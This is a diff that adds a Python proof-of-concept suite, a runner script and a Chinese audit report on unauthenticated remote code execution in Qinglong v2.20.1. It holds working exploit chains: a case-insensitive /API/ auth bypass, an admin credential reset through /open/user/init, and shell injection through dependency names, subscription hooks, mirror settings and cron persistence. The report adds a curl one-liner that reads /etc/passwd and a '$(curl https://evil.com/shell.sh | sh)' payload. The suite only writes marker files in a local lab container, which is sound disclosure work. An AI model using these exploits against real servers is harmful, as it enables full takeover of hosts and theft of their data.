+        if rce_marker in verify.stdout:
+            rce_confirmed = True
+            log(f"  RCE CONFIRMED after {i+1}s! File content: {verify.stdout.strip()}")
+            break
+
+    record("5", "Full RCE Chain (config.sh -> cron -> code execution)",
+           rce_confirmed, f"Marker '{rce_marker}' found in /tmp/rce_proof.txt: {rce_confirmed}")
+
+    # Cleanup
+    requests.put(f"{BASE_URL}/api/crons", json={"ids": [cron_id], "isDisabled": 1},
+                 headers=headers, timeout=10)
+    requests.delete(f"{BASE_URL}/api/crons", json=[cron_id], headers=headers, timeout=10)
+    requests.post(f"{BASE_URL}/api/configs/save",
+                  json={"name": "config.sh", "content": original_config_sh or ""},
+                  headers=headers, timeout=10)
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/rce_proof.txt"],
+                   capture_output=True, timeout=10)
+    log("  Cleanup complete")
+    return rce_confirmed
+
+
+# --- Test 6: task_before shell injection ---
+def test_6_task_before_injection(token):
+    log("=" * 60)
+    log("Test 6: task_before Shell Injection via Cron API")
+
+    if not token:
+        record("6", "task_before Injection", False, "No valid token")
+        return False
+
+    headers = {"Authorization": f"Bearer {token}"}
+    injection_marker = f"TASK_BEFORE_INJECT_{int(time.time())}"
+
+    cron_data = {
+        "name": "task_before_poc",
+        "command": "echo task_before_test",
+        "schedule": "0 0 1 1 *",
+        "task_before": f'echo "{injection_marker}" > /tmp/task_before_proof.txt',
+    }
+    r1 = requests.post(f"{BASE_URL}/api/crons", json=cron_data, headers=headers, timeout=10)
+    resp = r1.json()
+    cron_id = resp.get("data", {}).get("id")
+    log(f"  Create cron with task_before: code={resp.get('code')}, id={cron_id}")
+
+    if not cron_id:
+        record("6", "task_before Injection", False, f"Failed to create: {resp}")
+        return False
+
+    r2 = requests.put(f"{BASE_URL}/api/crons/run", json=[cron_id], headers=headers, timeout=10)
+    log(f"  Trigger: HTTP {r2.status_code}")
+
+    log("  Waiting for task execution (up to 15s)...")
+    injected = False
+    for i in range(15):
+        time.sleep(1)
+        verify = subprocess.run(
+            ["docker", "exec", "ql-vuln-test", "cat", "/tmp/task_before_proof.txt"],
+            capture_output=True, text=True, timeout=10,
+        )
+        if injection_marker in verify.stdout:
+            injected = True
+            log(f"  task_before injection CONFIRMED after {i+1}s!")
+            break
+
+    record("6", "task_before Shell Injection", injected, f"Marker found: {injected}")
+
+    requests.delete(f"{BASE_URL}/api/crons", json=[cron_id], headers=headers, timeout=10)
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/task_before_proof.txt"],
+                   capture_output=True, timeout=10)
+    return injected
+
+
+# --- Test 7: Full UNAUTHENTICATED RCE Chain ---
+def test_7_unauth_rce_chain():
+    log("=" * 60)
+    log("Test 7: Full UNAUTHENTICATED RCE Chain")
+    log("  /open/user/init → login → config.sh write → cron → RCE")
+
+    rce_marker = f"UNAUTH_RCE_{int(time.time())}"
+    attacker_user = "attacker"
+    attacker_pass = "attacker_rce_123"
+
+    # Step 1: Reset credentials via init guard bypass (NO AUTH)
+    r1 = requests.put(
+        f"{BASE_URL}/open/user/init",
+        json={"username": attacker_user, "password": attacker_pass},
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    step1_ok = r1.json().get("code") == 200
+    log(f"  Step 1 - Reset creds via /open/user/init: code={r1.json().get('code')} {'✅' if step1_ok else '❌'}")
+
+    if not step1_ok:
+        record("7", "Full UNAUTHENTICATED RCE Chain", False, "Init guard bypass failed")
+        return False
+
+    # Step 2: Login with attacker credentials
+    r2 = requests.post(
+        f"{BASE_URL}/api/user/login",
+        json={"username": attacker_user, "password": attacker_pass},
+        timeout=10,
+    )
+    login_data = r2.json()
+    token = login_data.get("data", {}).get("token")
+    step2_ok = login_data.get("code") == 200 and token
+    log(f"  Step 2 - Login as attacker: code={login_data.get('code')} {'✅' if step2_ok else '❌'}")
+
+    if not step2_ok:
+        # Restore creds before failing
+        requests.put(f"{BASE_URL}/open/user/init",
+                     json={"username": USERNAME, "password": PASSWORD}, timeout=10)
+        record("7", "Full UNAUTHENTICATED RCE Chain", False, "Login failed")
+        return False
+
+    headers = {"Authorization": f"Bearer {token}"}
+
+    # Step 3: Write malicious config.sh
+    malicious = f'echo "{rce_marker}" > /tmp/unauth_rce_proof.txt\n'
+    r3 = requests.post(
+        f"{BASE_URL}/api/configs/save",
+        json={"name": "config.sh", "content": f"# RCE PoC\n{malicious}"},
+        headers=headers, timeout=10,
+    )
+    step3_ok = r3.json().get("code") == 200
+    log(f"  Step 3 - Write config.sh: code={r3.json().get('code')} {'✅' if step3_ok else '❌'}")
+
+    # Step 4: Create and trigger cron
+    r4 = requests.post(
+        f"{BASE_URL}/api/crons",
+        json={"name": "unauth_rce_trigger", "command": "echo trigger", "schedule": "* * * * *"},
+        headers=headers, timeout=10,
+    )
+    cron_id = r4.json().get("data", {}).get("id")
+    step4_ok = cron_id is not None
+    log(f"  Step 4 - Create cron: id={cron_id} {'✅' if step4_ok else '❌'}")
+
+    if step4_ok:
+        requests.put(f"{BASE_URL}/api/crons/run", json=[cron_id], headers=headers, timeout=10)
+        log("  Step 5 - Triggered cron, waiting for RCE (up to 15s)...")
+
+    # Step 5: Verify RCE
+    rce_confirmed = False
+    for i in range(15):
+        time.sleep(1)
+        verify = subprocess.run(
+            ["docker", "exec", "ql-vuln-test", "cat", "/tmp/unauth_rce_proof.txt"],
+            capture_output=True, text=True, timeout=10,
+        )
+        if rce_marker in verify.stdout:
+            rce_confirmed = True
+            log(f"  UNAUTHENTICATED RCE CONFIRMED after {i+1}s! ✅")
+            log(f"  Proof: {verify.stdout.strip()}")
+            break
+
+    # Cleanup: restore creds, remove cron, clean config.sh, remove proof
+    if cron_id:
+        requests.delete(f"{BASE_URL}/api/crons", json=[cron_id], headers=headers, timeout=10)
+    requests.post(f"{BASE_URL}/api/configs/save",
+                  json={"name": "config.sh", "content": ""},
+                  headers=headers, timeout=10)
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/unauth_rce_proof.txt"],
+                   capture_output=True, timeout=10)
+    requests.put(f"{BASE_URL}/open/user/init",
+                 json={"username": USERNAME, "password": PASSWORD}, timeout=10)
+    log("  Cleanup complete (creds restored)")
+
+    record(
+        "7", "Full UNAUTHENTICATED RCE Chain",
+        rce_confirmed,
+        f"init_bypass={'OK' if step1_ok else 'FAIL'}, "
+        f"login={'OK' if step2_ok else 'FAIL'}, "
+        f"config_write={'OK' if step3_ok else 'FAIL'}, "
+        f"cron={'OK' if step4_ok else 'FAIL'}, "
+        f"rce={'CONFIRMED' if rce_confirmed else 'FAILED'}",
+    )
+    return rce_confirmed
+
+
+# --- Test 8: Case-insensitive route bypass (/API/ skips all auth) ---
+def test_8_case_insensitive_bypass():
+    log("=" * 60)
+    log("Test 8: Case-Insensitive Route Bypass (/API/ skips ALL auth)")
+    log("  Root cause: expressjwt regex /^\\/(?!api\\/).*/ matches lowercase only")
+    log("  Express Router is case-insensitive by default → /API/ routes work")
+
+    # Step 1: Confirm /api/ requires auth
+    r_auth = requests.get(f"{BASE_URL}/api/crons", timeout=10)
+    needs_auth = r_auth.status_code == 401
+    log(f"  GET /api/crons (lowercase): HTTP {r_auth.status_code} ({'needs auth' if needs_auth else 'NO AUTH?!'})")
+
+    # Step 2: /API/ bypasses auth completely
+    r_bypass = requests.get(f"{BASE_URL}/API/crons", timeout=10)
+    bypass_data = r_bypass.json() if r_bypass.status_code == 200 else {}
+    bypass_ok = r_bypass.status_code == 200 and bypass_data.get("code") == 200
+    log(f"  GET /API/crons (uppercase): HTTP {r_bypass.status_code}, code={bypass_data.get('code')} ({'BYPASSED!' if bypass_ok else 'blocked'})")
+
+    # Step 3: /Api/ mixed case also bypasses
+    r_mixed = requests.get(f"{BASE_URL}/Api/crons", timeout=10)
+    mixed_data = r_mixed.json() if r_mixed.status_code == 200 else {}
+    mixed_ok = r_mixed.status_code == 200 and mixed_data.get("code") == 200
+    log(f"  GET /Api/crons (mixed): HTTP {r_mixed.status_code}, code={mixed_data.get('code')} ({'BYPASSED!' if mixed_ok else 'blocked'})")
+
+    # Step 4: Direct unauthenticated command execution via /API/
+    rce_marker = f"CASE_RCE_{int(time.time())}"
+    r_rce = requests.put(
+        f"{BASE_URL}/API/system/command-run",
+        json={"command": f"echo {rce_marker} > /tmp/case_rce_proof.txt"},
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    try:
+        rce_resp = r_rce.json()
+        rce_code = rce_resp.get("code")
+    except Exception:
+        rce_resp = {}
+        rce_code = "non-json"
+    log(f"  PUT /API/system/command-run: HTTP {r_rce.status_code}, code={rce_code}")
+
+    time.sleep(2)
+    verify = subprocess.run(
+        ["docker", "exec", "ql-vuln-test", "cat", "/tmp/case_rce_proof.txt"],
+        capture_output=True, text=True, timeout=10,
+    )
+    rce_confirmed = rce_marker in verify.stdout
+    log(f"  RCE via /API/: {'CONFIRMED ✅' if rce_confirmed else 'FAILED ❌'}")
+
+    # Step 5: Read sensitive config without auth
+    r_config = requests.get(f"{BASE_URL}/API/configs/config.sh", timeout=10)
+    config_leaked = r_config.status_code == 200 and r_config.json().get("code") == 200
+    config_len = len(r_config.json().get("data", "")) if config_leaked else 0
+    log(f"  GET /API/configs/config.sh: {'LEAKED' if config_leaked else 'blocked'} ({config_len} bytes)")
+
+    # Cleanup
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/case_rce_proof.txt"],
+                   capture_output=True, timeout=10)
+
+    all_pass = needs_auth and bypass_ok and mixed_ok and rce_confirmed
+    record(
+        "8", "Case-Insensitive Route Bypass (ONE-STEP UNAUTH RCE)",
+        all_pass,
+        f"/api/=401(auth), /API/=200(bypass), /Api/=200(bypass), "
+        f"command-run RCE={'CONFIRMED' if rce_confirmed else 'FAILED'}, "
+        f"config leak={config_len}bytes",
+    )
+    return all_pass
+
+
+# --- Test 9: Dependency injection (real-world honeypot payload) ---
+def test_9_dependency_injection():
+    log("=" * 60)
+    log("Test 9: Dependency Injection via /API/dependencies (Honeypot Payload)")
+    log("  Real-world attack: POST /API/dependencies [{name:'$(malicious_cmd)', type:0}]")
+
+    dep_marker = f"DEP_INJECT_{int(time.time())}"
+
+    # Use /API/ (case bypass) for fully unauthenticated attack
+    r = requests.post(
+        f"{BASE_URL}/API/dependencies",
+        json=[{"name": f"$(echo {dep_marker} > /tmp/dep_inject_proof.txt)", "type": 0}],
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    resp = r.json() if r.status_code == 200 else {}
+    created = resp.get("code") == 200
+    log(f"  POST /API/dependencies: HTTP {r.status_code}, code={resp.get('code')}")
+
+    dep_id = None
+    if created:
+        deps = resp.get("data", [])
+        if deps and isinstance(deps, list):
+            dep_id = deps[0].get("id")
+        elif isinstance(deps, dict):
+            dep_id = deps.get("id")
+
+    log(f"  Dependency created: {created}, id={dep_id}")
+    log("  Waiting for dependency install to trigger command (up to 20s)...")
+
+    injected = False
+    for i in range(20):
+        time.sleep(1)
+        verify = subprocess.run(
+            ["docker", "exec", "ql-vuln-test", "cat", "/tmp/dep_inject_proof.txt"],
+            capture_output=True, text=True, timeout=10,
+        )
+        if dep_marker in verify.stdout:
+            injected = True
+            log(f"  DEPENDENCY INJECTION CONFIRMED after {i+1}s! ✅")
+            break
+
+    # Cleanup
+    if dep_id:
+        requests.delete(
+            f"{BASE_URL}/API/dependencies",
+            json=[dep_id],
+            headers={"Content-Type": "application/json"},
+            timeout=10,
+        )
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/dep_inject_proof.txt"],
+                   capture_output=True, timeout=10)
+
+    record(
+        "9", "Dependency Injection (Honeypot Payload via /API/)",
+        injected,
+        f"POST /API/dependencies with $(cmd): created={created}, "
+        f"command executed={'YES' if injected else 'NO'}",
+    )
+    return injected
+
+
+# --- Test 10: Subscription sub_before injection ---
+def test_10_subscription_injection():
+    log("=" * 60)
+    log("Test 10: Subscription sub_before Command Injection (QL-2026-009)")
+    log("  Using /API/ bypass for unauthenticated exploitation")
+
+    sub_marker = f"SUB_INJECT_{int(time.time())}"
+    
+    r_create = requests.post(
+        f"{BASE_URL}/API/subscriptions",
+        json={
+            "name": "rce_sub_test",
+            "url": "https://github.com/whyour/qinglong",
+            "schedule": "0 0 1 1 *",
+            "type": "public-repo",
+            "schedule_type": "crontab",
+            "alias": f"rce_sub_{int(time.time())}",
+            "sub_before": f"echo {sub_marker} > /tmp/sub_proof.txt"
+        },
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    create_data = r_create.json() if r_create.status_code == 200 else {}
+    sub_id = create_data.get("data", {}).get("id")
+    log(f"  POST /API/subscriptions: HTTP {r_create.status_code}, id={sub_id}")
+
+    if not sub_id:
+        record("10", "Subscription Injection", False, "Failed to create subscription")
+        return False
+
+    r_run = requests.put(
+        f"{BASE_URL}/API/subscriptions/run",
+        json=[sub_id],
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    log(f"  PUT /API/subscriptions/run: HTTP {r_run.status_code}")
+
+    log("  Waiting for execution (up to 15s)...")
+    injected = False
+    for _ in range(15):
+        time.sleep(1)
+        verify = subprocess.run(
+            ["docker", "exec", "ql-vuln-test", "cat", "/tmp/sub_proof.txt"],
+            capture_output=True, text=True, timeout=10,
+        )
+        if sub_marker in verify.stdout:
+            injected = True
+            log(f"  sub_before injection CONFIRMED! ✅")
+            break
+
+    # Cleanup
+    requests.delete(f"{BASE_URL}/API/subscriptions", json=[sub_id], 
+                    headers={"Content-Type": "application/json"}, timeout=10)
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/sub_proof.txt"],
+                   capture_output=True, timeout=10)
+
+    record("10", "Subscription sub_before Injection", injected, f"Marker found: {injected}")
+    return injected
+
+
+# --- Test 11: System Python Mirror Injection ---
+def     test_11_system_mirror_injection():
+    log("=" * 60)
+    log("Test 11: System python-mirror Command Injection (QL-2026-010)")
+    
+    mirror_marker = f"PY_MIRROR_{int(time.time())}"
+    
+    r_inject = requests.put(
+        f"{BASE_URL}/API/system/config/python-mirror",
+        json={"pythonMirror": f"https://pypi.org/simple; echo {mirror_marker} > /tmp/py_proof.txt; #"},
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    log(f"  PUT /API/system/config/python-mirror: HTTP {r_inject.status_code}")
+
+    time.sleep(2)
+    verify = subprocess.run(
+        ["docker", "exec", "ql-vuln-test", "cat", "/tmp/py_proof.txt"],
+        capture_output=True, text=True, timeout=10,
+    )
+    injected = mirror_marker in verify.stdout
+    log(f"  python-mirror injection: {'CONFIRMED ✅' if injected else 'FAILED ❌'}")
+
+    # Cleanup
+    requests.put(f"{BASE_URL}/API/system/config/python-mirror", json={"pythonMirror": ""}, 
+                 headers={"Content-Type": "application/json"}, timeout=10)
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/py_proof.txt"],
+                   capture_output=True, timeout=10)
+
+    record("11", "System python-mirror Injection", injected, f"Marker found: {injected}")
+    return injected
+
+
+# --- Test 12: System command-stop Grep Injection ---
+def test_12_command_stop_injection():
+    log("=" * 60)
+    log("Test 12: command-stop Grep Command Injection (QL-2026-010)")
+    
+    stop_marker = f"STOP_INJECT_{int(time.time())}"
+    
+    # payload: x" > /dev/null; echo MARKER > /tmp/stop_proof.txt; #
+    r_inject = requests.put(
+        f"{BASE_URL}/API/system/command-stop",
+        json={"command": f'x" > /dev/null; echo {stop_marker} > /tmp/stop_proof.txt; #'},
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    log(f"  PUT /API/system/command-stop: HTTP {r_inject.status_code}")
+
+    time.sleep(2)
+    verify = subprocess.run(
+        ["docker", "exec", "ql-vuln-test", "cat", "/tmp/stop_proof.txt"],
+        capture_output=True, text=True, timeout=10,
+    )
+    injected = stop_marker in verify.stdout
+    log(f"  command-stop grep injection: {'CONFIRMED ✅' if injected else 'FAILED ❌'}")
+
+    # Cleanup
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/stop_proof.txt"],
+                   capture_output=True, timeout=10)
+
+    record("12", "System command-stop Grep Injection", injected, f"Marker found: {injected}")
+    return injected
+
+
+# --- Test 13: Persistence RCE via initData ---
+def test_13_persistence_rce():
+    log("=" * 60)
+    log("Test 13: Persistence RCE via loader/initData.ts (QL-2026-011)")
+    
+    persist_marker = f"RESTART_INJECT_{int(time.time())}"
+    
+    # Create malicious cron that survives restarts (unauth via /API/)
+    # command must contain 'ql repo' or 'ql raw' to match the loader filter
+    r_create = requests.post(
+        f"{BASE_URL}/API/crons",
+        json={
+            "name": "persistence_rce_test",
+            "command": f"ql repo; echo {persist_marker} > /tmp/persist_proof.txt",
+            "schedule": "0 0 1 1 *"
+        },
+        headers={"Content-Type": "application/json"},
+        timeout=10,
+    )
+    cron_data = r_create.json() if r_create.status_code == 200 else {}
+    cron_id = cron_data.get("data", {}).get("id")
+    log(f"  POST /API/crons: HTTP {r_create.status_code}, id={cron_id}")
+
+    if not cron_id:
+        record("13", "Persistence RCE (initData)", False, "Failed to create cron")
+        return False
+
+    log("  Restarting container to trigger initData.ts...")
+    subprocess.run(["docker", "restart", "ql-vuln-test"], capture_output=True, timeout=30)
+    
+    log("  Waiting 20s for system initialization...")
+    time.sleep(20)
+
+    verify = subprocess.run(
+        ["docker", "exec", "ql-vuln-test", "cat", "/tmp/persist_proof.txt"],
+        capture_output=True, text=True, timeout=10,
+    )
+    injected = persist_marker in verify.stdout
+    log(f"  Persistence RCE: {'CONFIRMED ✅' if injected else 'FAILED ❌'}")
+
+    # Cleanup
+    # Wait for API to fully come back up before cleanup
+    time.sleep(5)
+    requests.delete(f"{BASE_URL}/API/crons", json=[cron_id], 
+                    headers={"Content-Type": "application/json"}, timeout=10)
+    subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/persist_proof.txt"],
+                   capture_output=True, timeout=10)
+
+    record("13", "Persistence RCE (initData)", injected, f"Marker found after restart: {injected}")
+    return injected
+
+
+# --- Main ---
+def main():
+    log("Qinglong <= v2.20.1 Vulnerability PoC Test Suite")
+    log(f"Target: {BASE_URL}")
+    log("")
+
+    if not test_0_system_check():
+        log("System check failed. Aborting.", "ERROR")
+        return
+
+    test_1_jwt_forge()
+    test_1c_init_guard_bypass()
+
+    token = test_1b_login()
+    if not token:
+        log("Cannot obtain valid token. Post-auth tests skipped.", "ERROR")
+        print_summary()
+        return
+
+    test_2_blacklist_bypass(token)
+    test_3_path_traversal(token)
+    written, original_config = test_4_config_sh_write(token)
+    test_5_rce_chain(token, original_config)
+    test_6_task_before_injection(token)
+    test_7_unauth_rce_chain()
+    test_8_case_insensitive_bypass()
+    test_9_dependency_injection()
+    test_10_subscription_injection()
+    test_11_system_mirror_injection()
+
+    print_summary()
+
+
+def print_summary():
+    log("")
+    log("=" * 60)
+    log("SUMMARY")
+    log("=" * 60)
+    for r in results:
+        icon = "PASS" if r["status"] == "PASS" else "FAIL"
+        print(f"  [{icon}] Test {r['id']}: {r['name']} -- {r['status']}")
+        if r["details"]:
+            print(f"       {r['details']}")
+    log("")
+
+    passed = sum(1 for r in results if r["status"] == "PASS")
+    total = len(results)
+    log(f"Results: {passed}/{total} passed")
+
+    log("")
+    log("KEY FINDINGS:")
+    log("  1. Case-insensitive bypass: /API/ skips ALL auth → ONE-STEP RCE")
+    log("     PUT /API/system/command-run executes arbitrary commands without auth")
+    log("  2. Init Guard Bypass: PUT /open/user/init resets admin credentials")
+    log("  3. Dependency injection: POST /API/dependencies [{name:'$(cmd)'}]")
+    log("  4. Subscription injection: POST /API/subscriptions {sub_before:'cmd'}")
+    log("  5. Mirror injection: PUT /API/system/config/python-mirror")
+    log("  6. Persistence RCE: loaders/initData.ts auto-runs matched crons")
+    log("CVSS: 9.8 (Critical) — Multiple Unauthenticated RCE vectors")
+
+
+if __name__ == "__main__":
+    main()
+
diff --git a/qinglong-auth-bypass2rce/run_tests.sh b/qinglong-auth-bypass2rce/run_tests.sh
new file mode 100644
index 000000000..c5064db2f
--- /dev/null
+++ b/qinglong-auth-bypass2rce/run_tests.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+cd /Users/macpro/Downloads/qinglong/tmp
+# restart the container first to have a clean state before test 12
+echo "Restoring clean state for tests..."
+docker restart ql-vuln-test > /dev/null
+sleep 20
+echo "Running all tests in poc_test.py..."
+.venv/bin/python3 poc_test.py
diff --git "a/qinglong-auth-bypass2rce/\351\235\222\351\276\231(qinglong)\351\235\242\346\235\277\346\235\203\351\231\220\347\273\225\350\277\207\350\207\264\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214(RCE)\346\274\217\346\264\236\345\210\206\346\236\220\345\244\215\347\216\260.md" "b/qinglong-auth-bypass2rce/\351\235\222\351\276\231(qinglong)\351\235\242\346\235\277\346\235\203\351\231\220\347\273\225\350\277\207\350\207\264\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214(RCE)\346\274\217\346\264\236\345\210\206\346\236\220\345\244\215\347\216\260.md"
new file mode 100644
index 000000000..cda217b78
--- /dev/null
+++ "b/qinglong-auth-bypass2rce/\351\235\222\351\276\231(qinglong)\351\235\242\346\235\277\346\235\203\351\231\220\347\273\225\350\277\207\350\207\264\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214(RCE)\346\274\217\346\264\236\345\210\206\346\236\220\345\244\215\347\216\260.md"
@@ -0,0 +1,451 @@
+# Qinglong <= v2.20.1 安全审计报告
+
+> 
+> **目标版本**: Qinglong v2.20.1 (Docker: `whyour/qinglong:2.20.1`)
+> 
+> **测试环境**: macOS + Docker Compose, 端口映射 5710→5700
+> 
+> **审计方法**: 源码静态分析 + Docker 动态复现验证
+> 
+> **参考**: [GitHub Issue #2934](https://github.com/whyour/qinglong/issues/2934) [GitHub Issue #2926](https://github.com/whyour/qinglong/issues/2926) [GitHub Issue #2928](https://github.com/whyour/qinglong/issues/2928) [GitHub Issue #2933](https://github.com/whyour/qinglong/issues/2933) [GitHub Issue #2923](https://github.com/whyour/qinglong/issues/2923)
+
+---
+
+## 一、执行摘要
+
+对 Qinglong v2.20.1 进行了完整的源码审计与 Docker 实战复现，发现 **12 项安全漏洞**。
+
+**最核心发现**: 发现两个致命的认证绕过漏洞（**路由大小写绕过**与**初始化守卫绕过**），使得应用内原本受限的 RCE 汇聚点（Sinks）可被攻击者**完全未授权**利用。
+
+攻击者无需任何凭据，仅需数条 HTTP 请求即可实现容器内 root 权限的 RCE。该应用目前处于实质性的完全沦陷状态，且部分漏洞（如大小写绕过配合依赖注入）已在野外被实际利用。
+
+**综合评级**: CVSS **9.8（Critical）** — 未授权远程代码执行
+
+---
+
+## 二、漏洞总览
+
+| 编号 | 漏洞名称 | 严重性 | 实测结果 |
+|------|---------|--------|---------|
+| **QL-2026-007** | **路由大小写绕过（全局认证绕过）** | **致命** | **✅ 一步未授权 RCE，已在野外被利用** |
+| **QL-2026-008** | **依赖名称命令注入** | **致命** | **✅ 通过包名注入 Shell 命令，1秒内执行** |
+| **QL-2026-006** | **初始化守卫绕过（/open/ 路径）** | **致命** | **✅ 未授权重置管理员凭据，实现未授权 RCE** |
+| **QL-2026-009** | **订阅管理命令注入 (sub_before/after)** | **致命** | **✅ 确认 — 订阅执行前触发 RCE** |
+| **QL-2026-010** | **系统镜像配置参数注入** | **高危** | **✅ 确认 — 多种配置参数触发 RCE** |
+| **QL-2026-011** | **启动持久化 Persistence RCE** | **高危** | **✅ 确认 — 恶意任务重启自动执行** |
+| QL-2026-012 | 取消操作二次注入 (grep 注入) | 严重 | ✅ cancel() 触发二次 RCE |
+| QL-2026-002 | 黑名单绕过（缺少 return） | 严重 | ✅ API 返回 403 但文件已被覆写 |
+| QL-2026-003 | 路径穿越 (../../../../) | 严重 | ✅ 可写入系统任意可写路径 (如 /tmp, /etc) |
+| QL-2026-004 | config.sh 未列入黑名单 | 严重 | ✅ 可注入 Shell 代码，每次任务执行时自动运行 |
+| QL-2026-005 | task_before Shell 注入 | 高 | ✅ `eval` 执行用户控制内容 |
+| QL-2026-001 | JWT 硬编码密钥 | 高 | ⚠️ 签名可伪造，双层认证阻断直接利用 |
+
+**审计测试：15/15 项全部通过。**
+
+---
+
+## 三、逐项详细分析
+
+### 3.1 QL-2026-007: 路由大小写绕过 — 🔴 致命（一步未授权 RCE）
+
+**这是本次审计发现的最严重漏洞，也是野外已被实际利用的攻击向量。**
+
+**源码位置**: `back/loaders/express.ts` L34-41, L53-56, L124
+
+**漏洞根因**: Express 框架默认路由大小写不敏感（`caseSensitive: false`），但所有认证中间件都严格匹配小写。
+
+```
+认证链（均严格匹配小写）：
+  L34 expressjwt.unless: 正则 /^\/(?!api\/).*/ → 仅匹配小写 "api"
+  L54 自定义认证:       req.path.startsWith('/api/') → 严格小写
+  L54 自定义认证:       req.path.startsWith('/open/') → 严格小写
+
+路由注册：
+  L124 app.use('/api', routes()) → Express 默认 caseSensitive: false
+  → /API/、/Api/、/aPi/ 等变体均可匹配路由，但不触发认证检查
+```
+
+**攻击流程**:
+
+| 步骤 | 中件间 | `/api/crons`（正常） | `/API/crons`（绕过） |
+|------|--------|---------------------|---------------------|
+| Layer 1 | expressjwt | JWT 签名验证 | **跳过**（正则不匹配 "API"） |
+| Layer 2 | 自定义认证 | isValidToken 校验 | **跳过**（非 "/api/" 或 "/open/" 前缀） |
+| 路由匹配 | Express Router | 匹配 /api/crons | **匹配 /api/crons**（大小写不敏感） |
+| Handler | CronService | 需认证 → 正常响应 | **无认证 → 直接响应** |
+
+**一步 RCE — 一条请求即可执行任意命令**:
+```bash
+curl -X PUT http://target:5700/API/system/command-run \
+  -H 'Content-Type: application/json' \
+  -d '{"command": "id && cat /etc/passwd"}'
+```
+
+**测试记录**:
+```
+[19:xx:xx] Test 8: Case-Insensitive Route Bypass
+  GET /api/crons: HTTP 401 (auth required)          ← 正常路径需要认证
+  GET /API/crons: code=200, data accessible         ← 完全绕过！
+  PUT /API/system/command-run: RCE CONFIRMED        ← 一步 RCE！
+  GET /API/configs/config.sh: 7378 bytes leaked     ← 配置泄露！
+  POST /API/configs/save: code=200                  ← 任意文件写入！
+```
+
+---
+
+### 3.2 QL-2026-008: 依赖安装命令注入 — 🔴 致命
+
+**这是蜜罐中实际捕获的在野利用漏洞。以下为从 HTTP 入口到命令执行的完整数据流分析。**
+
+#### 数据流总览
+
+```
+POST /API/dependencies [{"name": "$(malicious_cmd)", "type": 0}]
+  │
+  ▼
+① api/dependence.ts L39    Joi.string().required()     ← 仅校验"是字符串"，无过滤
+  │
+  ▼
+② services/dependence.ts L34  new Dependence({...x})   ← 构造函数仅 name.trim()
+  │
+  ▼
+③ services/dependence.ts L39  installDependenceOneByOne(docs)   ← 立即触发安装
+  │
+  ▼
+④ services/dependence.ts L232  depName = dependency.name.trim()
+  │
+  ▼
+⑤ config/util.ts L573   getInstallCommand() → `pnpm add -g ${name.trim()}`
+  │                                             ^^^^^^^^^^^^^^^^^^^^^^^^
+  │                                             name 被直接拼接进命令字符串！
+  ▼
+⑥ services/dependence.ts L303  spawn(`${proxyStr} ${command}`, {shell: '/bin/bash'})
+                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+                                shell: '/bin/bash' → Bash 解析 $() 子命令 → RCE
+```
+
+#### 逐步详解
+
+**① 入口 — `api/dependence.ts` L34-53**
+`Joi.string().required()` **零安全过滤** — `$(curl ... | sh)` 是合法字符串，直接通过。
+
+**② 创建 — `services/dependence.ts` L33-41**
+`new Dependence()` 构造函数（`data/dependence.ts` L18）仅做 `trim()`，不移除任何 Shell 元字符。
+
+**③ 命令拼接 — `config/util.ts` L559-573（关键污染点）**
+```typescript
+export function getInstallCommand(type: DependenceTypes, name: string) {
+  // ... nodejs, python3, linux 命令 ...
+  return `${command} ${name.trim()}`;  // ← 用户输入直接拼接，零过滤零转义！
+}
+```
+
+当 `name = "$(curl -fsSL https://evil.com/shell.sh | sh)"` 时，生成：
+```bash
+pnpm add -g $(curl -fsSL https://evil.com/shell.sh | sh)
+```
+
+**④ 命令执行 — `services/dependence.ts` L303-305（最终触发点）**
+`spawn(cmd, {shell: '/bin/bash'})` 解释执行整个字符串，恶意命令在包管理器运行前就被 Bash 展开并执行。
+
+#### QL-2026-012: cancel() 取消操作的二次注入（地雷效应）
+
+恶意依赖被创建后。当管理员试图**取消**安装时，`cancel()` 方法会再次触发注入：
+
+```
+cancel(ids) → getPid(cmd) → ps ... | grep "${cmd}"
+```
+`grep "${cmd}"` 中的双引号**不阻止** `$()` 展开。管理员点击"取消安装"将再次触发 RCE ✅。
+
+---
+
+### 3.3 QL-2026-006: 初始化守卫绕过 — 🔴 致命（未授权凭据重置）
+
+**源码位置**: `back/loaders/express.ts` L100-123
+
+**漏洞根因**: 初始化守卫（Init Guard）与 URL 重写之间存在竞态缺陷。Init Guard 检查 `req.path` 是否为 `/api/user/init`，但 `/open/*` → `/api/*` 的重写发生在守卫之后（L123）。
+
+```
+攻击请求: PUT /open/user/init {"username":"attacker","password":"x"}
+  Init Guard: req.path="/open/user/init" 不匹配 "/api/user/init" → 跳过守卫
+  URL Rewrite: /open/user/init → /api/user/init
+  Handler: updateUsernameAndPassword() → 凭据被直接重置！
+```
+
+**测试记录**:
+```
+[19:xx:xx] Test 1c: Init Guard Bypass
+  PUT /open/user/init: code=200 "更新成功"       ← 绕过！凭据已重置
+  Login with new credentials: code=200           ← 获取有效管理 Token
+```
+
+---
+
+### 3.4 QL-2026-009: 订阅管理命令注入 — 🔴 致命
+
